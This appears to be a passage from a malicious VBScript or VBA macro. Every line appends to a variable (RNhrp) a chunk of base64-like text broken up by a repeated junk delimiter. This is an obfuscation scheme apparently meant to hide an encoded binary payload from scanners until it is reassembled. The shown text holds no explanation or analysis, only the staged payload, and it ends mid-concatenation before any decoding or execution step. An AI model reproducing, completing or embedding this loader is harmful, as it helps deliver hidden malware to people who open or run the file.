RNhrp = RNhrp & "FQ@@&&^%^#%@@&&^%^#%@@&&^%^#%BEMOQ0@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%RDChN@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%GKF0@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%Ym3@@&&^%^#%coS@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BihJ@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%GJjgM@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%ByhI@@&&^%^#%@@&&^%^#%@@&&^%^#%G"
RNhrp = RNhrp & "KEk@@&&^%^#%@@&&^%^#%@@&&^%^#%Ym3RI@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%lKE4@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%YTEihP@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%G3Q@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%q@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%BBZ@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%G@@"
RNhrp = RNhrp & "&&^%^#%C@@&&^%^#%@@&&^%^#%@@&&^%^#%b@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%ewI@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%BI@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%l@@&&^%^#%@@&&^%^#%@@&&^%^#%B"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%O@@&&^%^#%C@@&&^%^#%@@&&^%^#%CJ@@&&"
RNhrp = RNhrp & "^%^#%Q@@&&^%^#%@@&&^%^#%aQQ@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%BI@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%l@@&&^%^#%@@&&^%^#%@@&&^%^#%B@@&&^%^#"
RNhrp = RNhrp & "%g@@&&^%^#%@@&&^%^#%@@&&^%^#%O@@&&^%^#%C"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%Cg@@&&^%^#%Q@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%g@@&&^%^#%Q@@&&^%^#%@@&&^%^#%BU@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%Q@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%CzB@@&&^%^#%@@&&^%^#%@@&&^%^#%twQ@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%BI@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%l@@&&^%^#%@@&&^%^#%@@&&^%^#%B"
RNhrp = RNhrp & "OisCJhb+CQ@@&&^%^#%@@&&^%^#%KB4@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%oq@@&&^%^#%D4r@@&&^%^#"
RNhrp = RNhrp & "%iYW@@&&^%^#%P4J@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%oLw@@&&^%^#%@@&&^%^#%CiouKwImFg@@&&^%"
RNhrp = RNhrp & "^#%oM@@&&^%^#%@@&&^%^#%@@&&^%^#%CipKKwIm"
RNhrp = RNhrp & "Fv4J@@&&^%^#%@@&&^%^#%D+CQE@@&&^%^#%bzE@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%oq@@&&^%^#%D4r"
RNhrp = RNhrp & "@@&&^%^#%iYW@@&&^%^#%P4J@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%oMg@@&&^%^#%@@&&^%^#%CipaKwIm"
RNhrp = RNhrp & "Fv4J@@&&^%^#%@@&&^%^#%D+CQE@@&&^%^#%/gkC"
RNhrp = RNhrp & "@@&&^%^#%G8z@@&&^%^#%@@&&^%^#%@@&&^%^#%K"
RNhrp = RNhrp & "Kg@@&&^%^#%6KwImFv4J@@&&^%^#%@@&&^%^#%Bv"
RNhrp = RNhrp & "N@@&&^%^#%@@&&^%^#%@@&&^%^#%Cio@@&&^%^#%"
RNhrp = RNhrp & "SisCJhb+CQ@@&&^%^#%@@&&^%^#%/gkB@@&&^%^#"
RNhrp = RNhrp & "%G81@@&&^%^#%@@&&^%^#%@@&&^%^#%KKgBeKwIm"
RNhrp = RNhrp & "FgD+CQ@@&&^%^#%@@&&^%^#%/gkB@@&&^%^#%P4J"
RNhrp = RNhrp & "@@&&^%^#%g@@&&^%^#%oNg@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Cio+KwImFgD+CQ@@&&^%^#%@@&&^%^#%KDc@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%oqLisCJhY@@&&^%^#%"
RNhrp = RNhrp & "KDg@@&&^%^#%@@&&^%^#%@@&&^%^#%oqbisCJhY@"
RNhrp = RNhrp & "@&&^%^#%/gk@@&&^%^#%@@&&^%^#%P4J@@&&^%^#"
RNhrp = RNhrp & "%QD+CQI@@&&^%^#%/gkD@@&&^%^#%Cg5@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%KKk4r@@&&^%^#%iYW@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%@@&&^%^#%D+CQE@@&&^%^#%"
RNhrp = RNhrp & "KDo@@&&^%^#%@@&&^%^#%@@&&^%^#%oqSisCJhb+"
RNhrp = RNhrp & "CQ@@&&^%^#%@@&&^%^#%/gkB@@&&^%^#%G87@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%KKgBKKwImFv4J@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%D+CQE@@&&^%^#%bzw@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%oq@@&&^%^#%E4r@@&&^%^#"
RNhrp = RNhrp & "%iYW@@&&^%^#%P4J@@&&^%^#%@@&&^%^#%D+CQE@"
RNhrp = RNhrp & "@&&^%^#%KD0@@&&^%^#%@@&&^%^#%@@&&^%^#%oq"
RNhrp = RNhrp & "SisCJhb+CQ@@&&^%^#%@@&&^%^#%/gkB@@&&^%^#"
RNhrp = RNhrp & "%G8+@@&&^%^#%@@&&^%^#%@@&&^%^#%KKgBKKwIm"
RNhrp = RNhrp & "Fv4J@@&&^%^#%@@&&^%^#%D+CQE@@&&^%^#%bz8@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%oq@@&&^%^#%Dor"
RNhrp = RNhrp & "@@&&^%^#%iYW/gk@@&&^%^#%@@&&^%^#%G9@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%KKgBaKwIm"
RNhrp = RNhrp & "Fv4J@@&&^%^#%@@&&^%^#%D+CQE@@&&^%^#%/gkC"
RNhrp = RNhrp & "@@&&^%^#%G9B@@&&^%^#%@@&&^%^#%@@&&^%^#%K"
RNhrp = RNhrp & "Kg@@&&^%^#%6KwImFv4J@@&&^%^#%@@&&^%^#%Bv"
RNhrp = RNhrp & "Qg@@&&^%^#%@@&&^%^#%Cio@@&&^%^#%WisCJhb+"
RNhrp = RNhrp & "CQ@@&&^%^#%@@&&^%^#%/gkB@@&&^%^#%P4J@@&&"
RNhrp = RNhrp & "^%^#%gBvQw@@&&^%^#%@@&&^%^#%Cio@@&&^%^#%"
RNhrp = RNhrp & "OisCJhb+CQ@@&&^%^#%@@&&^%^#%b0Q@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%oq@@&&^%^#%D4r@@&&^%^#"
RNhrp = RNhrp & "%iYW@@&&^%^#%P4J@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%oRQ@@&&^%^#%@@&&^%^#%Cio+KwImFgD+CQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%KGs@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%YqSisCJhb+CQ@@&&^%^#%@@&&^%^#%/gkB"
RNhrp = RNhrp & "@@&&^%^#%G9G@@&&^%^#%@@&&^%^#%@@&&^%^#%K"
RNhrp = RNhrp & "KgBeKwImFgD+CQ@@&&^%^#%@@&&^%^#%/gkB@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%g@@&&^%^#%oRw@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%CipOKwImFgD+CQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "/gkB@@&&^%^#%ChI@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%KKj4r@@&&^%^#%iYW@@&&^%^#%P4J@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%oGQ@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Cio+KwImFgD+CQ@@&&^%^#%@@&&^%^#%KEk@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%oqLisCJhY@@&&^%^#%"
RNhrp = RNhrp & "KEo@@&&^%^#%@@&&^%^#%@@&&^%^#%oqnisCJhY@"
RNhrp = RNhrp & "@&&^%^#%/gk@@&&^%^#%@@&&^%^#%P4J@@&&^%^#"
RNhrp = RNhrp & "%QD+CQI@@&&^%^#%/gkD@@&&^%^#%P4JB@@&&^%^"
RNhrp = RNhrp & "#%D+CQU@@&&^%^#%/gkG@@&&^%^#%ChL@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%KKj4r@@&&^%^#%iYW@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%@@&&^%^#%@@&&^%^#%oT@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%Cio+KwImFgD+CQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%KE0@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%oqXisCJhY@@&&^%^#%/gk@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%QD+CQI@@&&^%^#%KE4@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%oqTisCJhY@@&&^%^#%"
RNhrp = RNhrp & "/gk@@&&^%^#%@@&&^%^#%P4J@@&&^%^#%Q@@&&^%"
RNhrp = RNhrp & "^#%oTw@@&&^%^#%@@&&^%^#%Cio+KwImFgD+CQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%KF@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%oqPisCJhY@@&&^%^#%/gk@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%Cgc@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%KKk4r@@&&^%^#%iYW@@&&^%^#%P4J@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%D+CQE@@&&^%^#%KFE@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%oqjisCJhY@@&&^%^#%/gk@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%P4J@@&&^%^#%QD+CQI@@&&^%^#%"
RNhrp = RNhrp & "/gkD@@&&^%^#%P4JB@@&&^%^#%D+CQU@@&&^%^#%"
RNhrp = RNhrp & "KFI@@&&^%^#%@@&&^%^#%@@&&^%^#%oqbisCJhY@"
RNhrp = RNhrp & "@&&^%^#%/gk@@&&^%^#%@@&&^%^#%P4J@@&&^%^#"
RNhrp = RNhrp & "%QD+CQI@@&&^%^#%/gkD@@&&^%^#%ChT@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%KKj4r@@&&^%^#%iYW@@&&"
RNhrp = RNhrp & "^%^#%P4J@@&&^%^#%@@&&^%^#%@@&&^%^#%oV@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%Cio+KwImFgD+CQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%KFU@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%oq@@&&^%^#%z@@&&^%^#%J@@&&^%^#%Cs@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "KwImFgD+CQ@@&&^%^#%@@&&^%^#%/gkB@@&&^%^#"
RNhrp = RNhrp & "%P4J@@&&^%^#%gD+CQM@@&&^%^#%/gkE@@&&^%^#"
RNhrp = RNhrp & "%P4JBQD+CQY@@&&^%^#%/gkH@@&&^%^#%ChW@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%KKg@@&&^%^#%+KwIm"
RNhrp = RNhrp & "FgD+CQ@@&&^%^#%@@&&^%^#%KFc@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%oqGisCJhYXKg@@&&^%^#%aKwIm"
RNhrp = RNhrp & "FhYq@@&&^%^#%D4r@@&&^%^#%iYWKwImFgIobQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BioTM@@&&^%^#%U@@&&^%^#%"
RNhrp = RNhrp & "k@@&&^%^#%E@@&&^%^#%@@&&^%^#%@@&&^%^#%U@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%BEr@@&&^%^#%iYWFyhz@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%GOi8@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%mI@@&&^%^#%k@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%4HQE@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%BcKI@@&&^%^#%E@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%4EQE@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%BEEflg@@&&^%^#%@@&&^%^#%@@&&^%^#%oC"
RNhrp = RNhrp & "Fyhx@@&&^%^#%@@&&^%^#%@@&&^%^#%GObE@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%43P///yYg"
RNhrp = RNhrp & "B@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Dju"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%c1k@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%oIjmkobg@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%Bg0gCg@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%DjW@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%EQUbPr3///8gBg@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%Chz@@&&^%^#%@@&&^%^#%@@&&^%^#%GOr8@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%4ug@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%cICZoo"
RNhrp = RNhrp & "bw@@&&^%^#%@@&&^%^#%BhMEI@@&&^%^#%M@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%WOaQ@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%mHo0J@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%BJRZymgQ@@&&^%^#%"
RNhrp = RNhrp & "cKIlF3K2B@@&&^%^#%BwoiUYcuQE@@&&^%^#%HCi"
RNhrp = RNhrp & "JRly+gQ@@&&^%^#%cKIlGnIOBQBwoiUbch4F@@&&"
RNhrp = RNhrp & "^%^#%HCiJRxyNgU@@&&^%^#%cKIlHXJMBQBwogwg"
RNhrp = RNhrp & "C@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%DhS"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%OKQ@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%RBRfW"
RNhrp = RNhrp & "EwUg@@&&^%^#%g@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%Chy@@&&^%^#%@@&&^%^#%@@&&^%^#%GOjg@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%mFgogDQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%Dgr@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%EQRzWg@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%Cihw@@&&^%^#%@@&&^%^#%@@&&^%^#%G"
RNhrp = RNhrp & "I@@&&^%^#%w@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%4FQ@@&&^%^#%@@&&^%^#%@@&&^%^#%BcT"
RNhrp = RNhrp & "BTj8/v//I@@&&^%^#%k@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%D+DgY@@&&^%^#%/gwG@@&&^%^#%EUO@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Cg@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%HH////t/v//mP///6b+"
RNhrp = RNhrp & "//+y/v//jP///8X+///V/v//Cg@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%n///8g////rv///xo@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%gBQ@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%Di5////cmQF@@&&"
RNhrp = RNhrp & "^%^#%H@@&&^%^#%LI@@&&^%^#%s@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%4qf///wYqGz@@&&^%"
RNhrp = RNhrp & "^#%L@@&&^%^#%LoG@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%G@@&&^%^#%@@&&^%^#%@@&&^%^#%RKwImFi@@"
RNhrp = RNhrp & "&&^%^#%G@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%OBoG@@&&^%^#%@@&&^%^#%@@&&^%^#%DKHc@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Y6tgQ@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%C@@&&^%^#%u@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%OM@@&&^%^#%B@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%RFBfaF9aNNw@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%RMWI@@&&^%^#%4@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%ocg@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%Bjqk@@&&^%^#%Q@@&&^%^#%@@&&^%^#%JnNb"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%KehEOHyjWEw4g"
RNhrp = RNhrp & "@@&&^%^#%g@@&&^%^#%@@&&^%^#%@@&&^%^#%DiM"
RNhrp = RNhrp & "@@&&^%^#%Q@@&&^%^#%@@&&^%^#%EQR7CQ@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%BBEJKGg@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%Y57@@&&^%^#%I@@&&^%^#%@@&&^%^#%C@@"
RNhrp = RNhrp & "&&^%^#%f@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%OG8B@@&&^%^#%@@&&^%^#%@@&&^%^#%oeg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%Bhp@@&&^%^#%WwM@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%C@@&&^%^#%c@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%KHI@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%Y6VQE@@&&^%^#%@@&&^%^#%CYIcs@@&&^%"
RNhrp = RNhrp & "^#%F@@&&^%^#%H@@&&^%^#%DKHg@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%YMIBc@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%ocw@@&&^%^#%@@&&^%^#%Bjo4"
RNhrp = RNhrp & "@@&&^%^#%Q@@&&^%^#%@@&&^%^#%ODMB@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%WExIgGg@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%Dgm@@&&^%^#%Q@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%c1s@@&&^%^#%@@&&^%^#%@@&&^%^#%p6EQR7"
RNhrp = RNhrp & "CQ@@&&^%^#%@@&&^%^#%BBENBBELEgEoZw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%Bjrs@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%ICE@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%4/g@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%HNb@@&&^%^#%@@&&^%^#%@@&&^%^#%KehEEewo@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Qoag@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%BhV@@&&^%^#%w@@&&^%^#%Q@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%C@@&&^%^#%v@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%ONw@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%RBHsJ@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%EFhEKI@@&&^%^#%@@&&^%^#%w@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%fQChp@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%GEw0XKHM@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%Y68QE@@&&^%^#%@@&&^%^#%CYgBw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%Diu@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%EQcWI@@&&^%^#%I@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%QCeICc@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%ocg@@&&^%^#%@@&&^%^#%BjqW"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%JgU6"
RNhrp = RNhrp & "kQE@@&&^%^#%@@&&^%^#%C@@&&^%^#%Q@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%OIU@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%RDDkE@@&&^%^#"
RNhrp = RNhrp & "%w@@&&^%^#%@@&&^%^#%IBY@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%XOnM@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%mBBEFH1TWKHk@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%YTCy@@&&^%^#%F@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%Fzpa@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%JhEEewk@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%QRCB7WEgkaEgEoZg@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%BjqZ@@&&^%^#%g@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%ICQ@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%WOTQ@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%mEQ06LgE@@&&^%^#%@@&&^%^#%C@@&&^%"
RNhrp = RNhrp & "^#%J@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "OCI@@&&^%^#%@@&&^%^#%@@&&^%^#%BzWw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%CnoRBSD4@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%1hMOOHMD@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%gLg@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%P4OG@@&&^%^#%D+DBg@@&&^%^#%RT@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%Bt@@&&^%^#%g@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%Ww@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%PIB@@&&^%^#%@@&&^%^#%Ch@@&&^%^#%g@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%mP3//xo@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%DB@@&&^%^#%Q@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "PQ@@&&^%^#%@@&&^%^#%@@&&^%^#%BX+//9O@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%xQ@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%FMC@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%DJ/v//X/7//xMB@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%s@@&&^%^#%Q@@&&^%^#%@@&&^%^#%CP///wj+"
RNhrp = RNhrp & "//9P@@&&^%^#%Q@@&&^%^#%@@&&^%^#%lw@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%D0@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%CK@@&&^%^#%g@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "D@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%CcC"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%C2/v//ZwE@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%NwC@@&&^%^#%@@&&^%^#%Cq@@&&^%^#%Q@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%uQI@@&&^%^#%@@&&^%^#%K/9"
RNhrp = RNhrp & "//+E@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "q@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Nw@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Z////"
RNhrp = RNhrp & "pv7//+8@@&&^%^#%@@&&^%^#%@@&&^%^#%CP@@&&"
RNhrp = RNhrp & "^%^#%Q@@&&^%^#%@@&&^%^#%1wE@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%G4@@&&^%^#%@@&&^%^#%@@&&^%^#%DM/f//"
RNhrp = RNhrp & "jf7//z3+//8C@@&&^%^#%g@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "4v7//3v9///4@@&&^%^#%g@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "5/3//w8D@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&"
RNhrp = RNhrp & "^%^#%w@@&&^%^#%@@&&^%^#%@@&&^%^#%BY5MP//"
RNhrp = RNhrp & "/yYRBhMNI@@&&^%^#%Y@@&&^%^#%@@&&^%^#%@@&"
